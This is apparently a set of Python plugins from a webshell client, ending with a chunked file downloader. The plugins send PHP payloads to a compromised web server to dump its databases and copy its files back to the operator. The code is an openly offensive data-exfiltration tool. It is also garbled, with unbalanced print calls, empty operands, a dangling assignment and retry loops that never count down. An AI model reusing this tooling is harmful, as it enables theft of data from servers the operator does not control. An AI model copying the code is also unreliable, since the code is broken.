def run(database: str = "", table: str = "", local_path: str = "", encoding: str = "utf8"): """ db_dump Dump a database or a table to a file, Default file name is {database}.sql. eg: db_dump {database=current_database} {local_path=doughnuts/target/{database}.sql} {encoding="utf-8"} """ if (not gget("db_connected", "webshell")): print("Please run db_init command first")) return database = database if database else gget("db_dbname", "webshell") download_path = local_path or gget("webshell.download_path", "webshell") if not path.exists(download_path): makedirs(download_path) file_name = f"{database}.sql" if (not table) else f"{database}.{table}.sql" res = send(get_php(database, table, encoding)) if (not res): return text = res.r_text.strip() content = res.r_content.strip() if (len(text) > 0 and res.status_code == 200): file_path = path.join(download_path, file_name).replace("\\", "/") with open(file_path, "wb") as f: f.write(gzinflate(b64decode(content))) print("\n" +"Dump {database} to {file_name} success") + "\n") elif ("Error" in res.r_text): print("\n" + + "\n") else: print("\nError\n"))
def get_data(database, table, encoding, offset, blocksize): connect_type = gget("db_connect_type", "webshell") if (connect_type == "pdo"): php = """%s if(!$con){ die("Error : connect to sql failed..."); } $table_name="%s"; $offset=%s; $size=%s; $content = ""; $table_records = $con->query("select * from $table_name limit $offset,$size;"); while($record = $table_records->fetch(PDO::FETCH_ASSOC)){ $vals = "'".join("','",array_map('addslashes',array_values($record)))."'"; $content .= "insert into `$table_name` values($vals);\\r\\n"; } echo base64_encode(gzdeflate($content)); """ % (get_db_connect_code(dbname=database), table, offset, blocksize) elif (connect_type == "mysqli"): php = """%s if(!$con){ die("Error : connect to sql failed..."); } $table_name="%s"; $offset=%s; $size=%s; $content = ""; $table_records = $con->query("select * from $table_name limit $offset,$size;"); while($record = mysqli_fetch_assoc($table_records)){ $vals = "'".join("','",array_map('mysql_real_escape_string',array_values($record)))."'"; $content .= "insert into `$table_name` values($vals);\\r\\n"; } echo base64_encode(gzdeflate($content)); """ % (get_db_connect_code(dbname=database), table, offset, blocksize) else: php = "" retry_time = 5 text = None while retry_time and not text: res = send(php) try: text = gzinflate(b64decode(res.r_content.strip())) except Exception: text = None return text if text else ""
def get_table_construct(database, table, encoding): connect_type = gget("db_connect_type", "webshell") if (connect_type == "pdo"): php = """%s if(!$con){ die("Error : connect to sql failed..."); } $table_name="%s"; $table_created_data = $con->query("show create table `$table_name`"); $table_created_data_array = $table_created_data->fetch(PDO::FETCH_BOTH); $struct=str_replace("NOT NULL", "", $table_created_data_array['Create Table']); $content .= "DROP TABLE IF EXISTS `$table_name`;\\r\\n".$struct.";\\r\\n\\r\\n"; echo base64_encode(gzdeflate($content)); """ % (get_db_connect_code(dbname=database), table) elif (connect_type == "mysqli"): php = """%s if(!$con){ die("Error : connect to sql failed..."); } $table_name="%s"; $table_created_data = mysqli_query($con,"show create table `$table_name`"); $table_created_data_array = mysqli_fetch_array($table_created_data); $struct=str_replace("NOT NULL", "", $table_created_data_array['Create Table']); $content .= "DROP TABLE IF EXISTS `$table_name`;\\r\\n".$struct.";\\r\\n\\r\\n"; echo base64_encode(gzdeflate($content)); """ % (get_db_connect_code(dbname=database), table) else: php = "" retry_time = 5 text = None while retry_time and not text: res = send(php) try: text = gzinflate(b64decode(res.r_content.strip())) except Exception: text = None return text if text else ""
def run(web_file_path: str, local_path: str = "", humansize: str = "1MB", threads: int = 5) -> bool: """ mdownload Download file from target system by block compression and multi threads. eg: mdownload {web_file_path} {local_path=doughnuts/target/} {humansize="1MB",eg="10MB"} {threads=5} """ global LOCK, DOWNLOAD_SUCCESS res = send(get_filesize_php(web_file_path)) if (not res): return try: file_size = int(res.r_text.strip()) except ValueError: file_size = 0 try: blocksize = human_to_size(humansize) except Exception: blocksize = file_size // 10 print( color.yellow( f"[Warn] Parse humansize error, set it to {size_to_human(blocksize)}" )) if (blocksize < file_size / 1000): blocksize = file_size // 100 print( color.yellow( f"[Warn] Humansize too small, set it to {size_to_human(blocksize)}" )) file_human_size = if (file_size): download_path = local_path or gget("webshell.download_path", "webshell") file_path = path.join(download_path, path.split(web_file_path)[1]).replace("\\", "/") content_length = 0 chunk_dict = {} with ThreadPoolExecutor(max_workers=threads) as tp, tqdm( total=file_size, desc="Downloading", unit_scale=True) as bar: all_task = [ tp.submit(get_data, web_file_path, n, offset, blocksize) for n, offset in enumerate(range(0, file_size, blocksize)) ] for future in as_completed(all_task): n, chunk = future.result() if (chunk): chunk_dict[n] = chunk with LOCK: content_length += blocksize bar.update(blocksize) else: DOWNLOAD_SUCCESS = False break if (not DOWNLOAD_SUCCESS): for task in reversed(all_task): task.cancel() bar.close() return with open(file_path, "wb") as fp, tqdm(total=file_size, desc="Decompressing", unit_scale=True) as bar: for i in range(len(all_task)): content = gzinflate(b64decode(chunk_dict[i])) fp.write(content) fp.flush() bar.update(blocksize) print("\nDownloaded file has been saved to {file_path}\n")) else: print("\nFile not exist / Download error\n")) return ''